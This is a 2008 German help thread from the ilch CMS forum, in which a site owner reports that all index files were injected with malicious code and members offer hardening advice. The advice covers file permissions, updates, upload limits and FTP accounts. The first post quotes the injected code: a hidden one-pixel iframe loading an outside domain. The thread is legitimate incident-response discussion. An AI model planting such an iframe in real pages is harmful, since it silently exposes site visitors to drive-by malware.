ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » ilch gehackt?

Geschlossen
  1. Do. 24.07.2008 03:42 Uhr #1
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    hi
    also mir ist heut aufgefallen dass ur plötzlich wenn ich auf meiner site surfe, dass sich da nen addon im ie7 aktiviert...

    als ichs deaktiviert hab, hat meine hp nen fehler angezeigt....

    beim rumfuchteln hab ich irgendwas mit neox2009.com und sowas in der richtung gefunden, sowie nen winows tool wo anscheinend wer den zugriff von aussen erhält...

    ich kenn mich da ned so aus, aber merkwürdig ist das schon...

    weiss einer was da los ist, und wie ich sowas besser überprüfen kann, ob da wer meine site am hacken is?


    verwendete ilchClan Version: 1.1

    betroffene Homepage: externer Link

    ich hab im quelltext unten was gefunden wie:
    <iframe src="http://klinoneshoes.info" width=1 height=1 style="visibility: hidden"></iframe>


    Zuletzt modifiziert von Schommie am 24.07.2008 - 03:46:12
    0 Mitglieder finden den Beitrag gut.
  2. Do. 24.07.2008 05:18 Uhr #2
    User Pic
    Tyrargo Mitglied
    Registriert seit
    30.01.2006
    Beiträge
    5.541
    Beitragswertungen
    7 Beitragspunkte
    dann lösch das ding ausm quelltext raus und gut ist.

    danach aktualisierst du mal auf die aktuellste version.

    kann sein, daß sich sowas auch in anderen dateien einschleicht.
    Clanseite | Beste Seite wo gibt ^^
    Mairus Ilch-Mods
    0 Mitglieder finden den Beitrag gut.
  3. Do. 24.07.2008 12:55 Uhr #3
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    ja habs ausm quelltext gelöscht...

    aber hab jetzt angst lachen

    also wenn da irgend son depp da irgend nen iframe reinschreibt, dann kann man da doch auch irgendwelche trojaner und son kack reinschreiben...

    kann man das ned irgendwie unterbinden?

    ach und ich hab rausgefunden dass es nicht an ilch liegt...

    alle meine index dateien waren befallen, nicht nur die von ilch, sondern alle index.html, index.htm, index.php dateien
    0 Mitglieder finden den Beitrag gut.
  4. Do. 24.07.2008 13:40 Uhr #4
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    ja liegt eher an deinem webserver bzw. dem apache

    wenns dir möglich ist dann update ihn oder weise deinen hoster mal darauf hin.

    ansonsten empfehle ich dir einen wechsel
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  5. Do. 24.07.2008 14:37 Uhr #5
    User Pic
    Hassmann Mitglied
    Registriert seit
    13.02.2008
    Beiträge
    1.591
    Beitragswertungen
    9 Beitragspunkte
    index.php auf chmod 444 setzen dann is sie nid mehr beschreibbar
    Sub2Go.NET | Kostenlosen Webspace mit vielen features! Für Ilch-Forumsmitglieder doppelten Speicher!
    Mave1993.de Blog
    0 Mitglieder finden den Beitrag gut.
  6. Do. 24.07.2008 15:20 Uhr #6
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    thx hassmann genau sowas hab ich gesucht^^

    thx
    0 Mitglieder finden den Beitrag gut.
  7. Sa. 26.07.2008 22:21 Uhr #7
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    sry fürs doppelposting...

    scheinbar ist es was tiefliegendes...

    also wenn man die page nun aufruft lädt sich direkt son blödes tool runter...

    und man sieht unten in der statusleiste dass sich immernoch ne menge seiten öffnen die da nich rein gehören...

    kann das an nem modul liegen? und wenn ja an welchem?

    und wie kann ich mein ilch noch retten?
    0 Mitglieder finden den Beitrag gut.
  8. Sa. 26.07.2008 22:57 Uhr #8
    User Pic
    Panicsheep Hall Of Fame
    Registriert seit
    24.08.2004
    Beiträge
    10.192
    Beitragswertungen
    16 Beitragspunkte
    Du könntest mal sagen welche Modul du alles installiert/hochgeladen hast.
    Omnia bona erunt
    0 Mitglieder finden den Beitrag gut.
  9. So. 27.07.2008 14:40 Uhr #9
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    hmm also

    BBCode2.0_11I
    phgstats_for_ilch1.1_v1.8h
    ts_completepack_12
    startseite_110
    SafeShoutbox1.0
    server_war_rules_ilch1.1.rar
    linkus.rar

    so glaub das sind alle module...
    0 Mitglieder finden den Beitrag gut.
  10. Mo. 28.07.2008 13:22 Uhr #10
    User Pic
    Blacktitan Mitglied
    Registriert seit
    31.03.2007
    Beiträge
    537
    Beitragswertungen
    0 Beitragspunkte
    module kannste per MySQL glaub ich löschen

    und ein Tipp für dich für die Zukunft: immer schon BackUps machen^^ von MySQL und dem Webspace zunge ist nervig sollte man aber machen
    The BlackTitans Clan
    visit us externer Link
    Call of Duty 6 und Battlefield Bad Company 2
    0 Mitglieder finden den Beitrag gut.
  11. Di. 29.07.2008 15:43 Uhr #11
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    ich will sie ja nicht löschen... ich will nur wissen wie es sein kann dass da jemand dateien bearbeiten kann, ohne mein ftp passwort zu kennen...

    scheinbar war das ne art bot... denn ich glaub die mühe macht sich niemand von hand...

    also kann mir hier keiner helfen oder wie?


    Zuletzt modifiziert von Schommie am 29.07.2008 - 15:45:02
    0 Mitglieder finden den Beitrag gut.
  12. Di. 29.07.2008 16:48 Uhr #12
    User Pic
    Tyrargo Mitglied
    Registriert seit
    30.01.2006
    Beiträge
    5.541
    Beitragswertungen
    7 Beitragspunkte
    vielleicht hattest nen einfaches kennwort. nur ein wort, ohne zahlen drin oder sonderzeichen.

    vielleicht kannte es ja doch jemand.

    und wie schon geschrieben hatte: hoster mal bescheid geben, daß eventuell mal geupdatet wird.
    Clanseite | Beste Seite wo gibt ^^
    Mairus Ilch-Mods
    0 Mitglieder finden den Beitrag gut.
  13. Di. 29.07.2008 23:15 Uhr #13
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    ich habn mehrstelliges kennzeichen mit buchstaben und zahlen, dass niemand kennt, da ich es eigentlich nur bei sachen nutze bei denen es ums geld geht, oder bei denen es richtig sicher sein muss...

    nichtmal meine e-mail addy hat das pw...

    und so wie ich die referer durchstöbert hab, wars wohl auch eher nen gezielter angriff auf meine page...

    also noch einmal meine unbeantwortete frage:

    wie kommt jemand auf mein ftp ohne mein pw zu kennen?!
    und wie schafft er es, codes im quelltext zu schreiben, auf allen index seiten.... (iframe)

    und am wichtigsten: wie unterbinde ich das?
    0 Mitglieder finden den Beitrag gut.
  14. Mi. 30.07.2008 07:59 Uhr #14
    User Pic
    Tyrargo Mitglied
    Registriert seit
    30.01.2006
    Beiträge
    5.541
    Beitragswertungen
    7 Beitragspunkte
    ZitatZitat geschrieben von Hassmann

    index.php auf chmod 444 setzen dann is sie nid mehr beschreibbar


    so geht das!

    außerdem würd ich die aktuellste version vom script nehmen.
    bei den alten versionen war es möglich, durch nen userupload den code auszuführen.

    also würd ich auch userupload unterbinden.
    Clanseite | Beste Seite wo gibt ^^
    Mairus Ilch-Mods
    0 Mitglieder finden den Beitrag gut.
  15. Do. 31.07.2008 07:42 Uhr #15
    User Pic
    RaptorX2 Mitglied
    Registriert seit
    03.01.2008
    Beiträge
    41
    Beitragswertungen
    0 Beitragspunkte
    Hallo Schommie,

    das mit dem Userupload kann ich bestätigen. Hatte auch mal ein Problem, dass ein ausführbares Script hochgeladen wurde!

    Habe es aber rechtzeitig erkennen können!

    Hoffe deine HP ist bald wieder online lächeln

    MfG
    RaptorX2
    0 Mitglieder finden den Beitrag gut.
  16. Do. 31.07.2008 11:50 Uhr #16
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    Es gab auch mal ne Lücke im apache webserver, wo man die dateien beliebig verändern konnte.

    weis nicht genau ob man das mit chmod 444 unterbinden kann, aber es sollte ein update geben das dies verhindert.

    ja und aufpassen das keine scripte hochgeladen werden, also user quasi nur erlauben ihre eignen bilder hochzuladen und der rest muss erst durch die hand eines admins gehen.
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  17. Sa. 02.08.2008 19:41 Uhr #17
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    wenn ich chmod 444 einstell kommt folgendes:

    -------------------------------
    Zugriff verweigert!
    Der Zugriff auf das angeforderte Objekt ist nicht möglich. Entweder kann es vom Server nicht gelesen werden oder es ist zugriffsgeschützt.

    Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.

    Error 403
    www.gamercom.org
    Sat Aug 2 19:39:28 2008
    Apache/2.0.49 (Linux/SuSE)
    --------------------------------

    habs auf 555 geändert, da funktionierts scheinbar...

    erstmal ist die page zwar on, aber noch sind keine plugins drauf, die folgen jetzt nach und nach...


    Zuletzt modifiziert von Schommie am 02.08.2008 - 19:43:23
    0 Mitglieder finden den Beitrag gut.
  18. Sa. 02.08.2008 19:54 Uhr #18
    User Pic
    nixmomo Mitglied
    Registriert seit
    30.07.2008
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Mal ne Frage nur sofern es weder am apache noch am ilch script oder useruploads liegt.

    Hast du zufällig ne einsicht von dem ftp Server? Wenn ich da an Sachen wie xampp denke gibt es einen anonymen zugriff ohne passwort und sowas also solltest du dein eigener hoster sein und dummerweise xampp nutzen schau dort doch mal ins admininterface von filezilla ober anonymus user da noch drin steht und lösch den raus.

    Sone Probleme in der art hatte ich früher bei nem anbieter der allerdings wies mir vorkam keine ahnung hatte
    Ab dem 3. August ca 13 Uhr auf unbestimmte Zeit inaktiv da bei mir zuhause die netten Bauarbeiter die Leitung gekappt haben. Bin aber bald wieder da
    0 Mitglieder finden den Beitrag gut.
  19. Sa. 02.08.2008 20:08 Uhr #19
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    in wie weit einsicht?

    also ich hab ne admin oberfläche....

    confixx... von da aus kann ich nahezu alles steuern was meinen teil des webservers angeht...

    also mysql, ftp konten, e-mail konten ect.


    Zuletzt modifiziert von Schommie am 02.08.2008 - 20:10:22
    0 Mitglieder finden den Beitrag gut.
  20. Sa. 02.08.2008 20:20 Uhr #20
    User Pic
    nixmomo Mitglied
    Registriert seit
    30.07.2008
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    dann geh ich ma davon aus das es auchn anbieter is dern bissl ahnung davon haben sollte falls es doch son freehoster oder sowas is frag den doch ma ob dort ein anonymer ftp user existiert wie gesagt bei filezilla is der standart bei anderen ftp servern könnte es ähnlich sein das es ein zugriff ohne pw auf oberster ftp ebene gibt
    kontrollier auch mal deine ftp user ob dort einer is den du nich kennst der auch zugriff auf dein webspace hat bzw auf den ordner wo ilch installiert is
    Ab dem 3. August ca 13 Uhr auf unbestimmte Zeit inaktiv da bei mir zuhause die netten Bauarbeiter die Leitung gekappt haben. Bin aber bald wieder da
    0 Mitglieder finden den Beitrag gut.
  21. Sa. 02.08.2008 20:30 Uhr #21
    User Pic
    nixmomo Mitglied
    Registriert seit
    30.07.2008
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Also nich das ich was gegen freehoster oder so habe aber man sollte schon ahnung von dem haben was man da macht wenn man sowas schon anbietet. Bin ja selbst son freehoster allerdings is dasn hobby und ich mach sowas beruflich auch also weiß ich wovon ich rede ^^
    Ab dem 3. August ca 13 Uhr auf unbestimmte Zeit inaktiv da bei mir zuhause die netten Bauarbeiter die Leitung gekappt haben. Bin aber bald wieder da
    0 Mitglieder finden den Beitrag gut.
  22. Sa. 02.08.2008 23:41 Uhr #22
    User Pic
    Schommie Mitglied
    Registriert seit
    13.06.2008
    Beiträge
    86
    Beitragswertungen
    1 Beitragspunkte
    also nen freehoster ist es ned... das weiss ich^^

    und ftp user bin nur ich (laut admin bereich)

    also ich hab da niemand sonst eingetragen, da der server und das alles auf mich läuft, und ich da auch haftbar für bin ect...

    mitlerweile wenn ich die page wieder voll aufgezogen habe (backup hat geklappt^^)
    werde ich auch die user upload rechte voll entziehen, dass nur ich alleinigen zugriff habe auf den ftp bereich sowie auch nur ich im admin panel was editieren kann und hochladen kann.
    0 Mitglieder finden den Beitrag gut.
  23. Sa. 02.08.2008 23:59 Uhr #23
    User Pic
    nixmomo Mitglied
    Registriert seit
    30.07.2008
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    webftp oder sowas hatteste auch nicht? egal ob das modul von ilch oder eben normales web ftp?

    wenn das alles nich der fall ist solltest du echt in betracht ziehen den apache auf die aktuellste version updatest. Sofern du auch deinen ftp server updaten kannst solltest du auch das inbetracht ziehen war vielleicht dort ne sicherheitslücke oder sowas.
    Wenn sowas nochmal passiert solltest du auch dein root passwort ändern und schauen ob alle ports die nicht benötigt werden auch geschlossen sind usw.
    Check vorsichtshalber auch einfach nur mal zum spaß in wieweit deine festplatten belegt sind gibt da sowas wie phpsysinfo wasde einfach nur uffn webspace packen mußt. Wenn du dort feststellst das deine platten fast voll sind obwohl du kaum daten drauf hast solltest du eine server neuinstallation in betracht ziehen da dein server dann evtl. kompromitiert wurde
    Ab dem 3. August ca 13 Uhr auf unbestimmte Zeit inaktiv da bei mir zuhause die netten Bauarbeiter die Leitung gekappt haben. Bin aber bald wieder da
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten